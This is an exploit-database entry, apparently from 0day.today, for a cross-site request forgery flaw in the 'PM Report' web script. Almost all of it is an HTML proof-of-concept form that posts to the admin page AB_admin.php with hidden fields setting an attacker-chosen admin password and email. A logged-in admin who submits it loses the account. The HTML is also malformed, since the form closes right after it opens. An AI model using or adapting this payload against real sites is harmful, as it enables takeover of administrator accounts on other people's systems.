id: 17830
date: 03/25/2012
title: PM Report CSRF Vulnerability
author: Jonturk75
cves: 

# Exploit Title: PM Report CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/pm-report/20972/
# Category::  webapps
# Demo : http://www.busmgtsys.com/dolphin_nine_demo/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com




<form action="target.com/[PATH]/AB_admin.php" method="post"></form>
<input name="npassword" value="yourpassword" size="15" type="hidden">
<input name="nemail_addy" value="mail@mail.com" size="15" type="hidden">
<button type="submit" class="lookup_button">Save Changes</button>
</form>



#  0day.today [2023-03-24]  #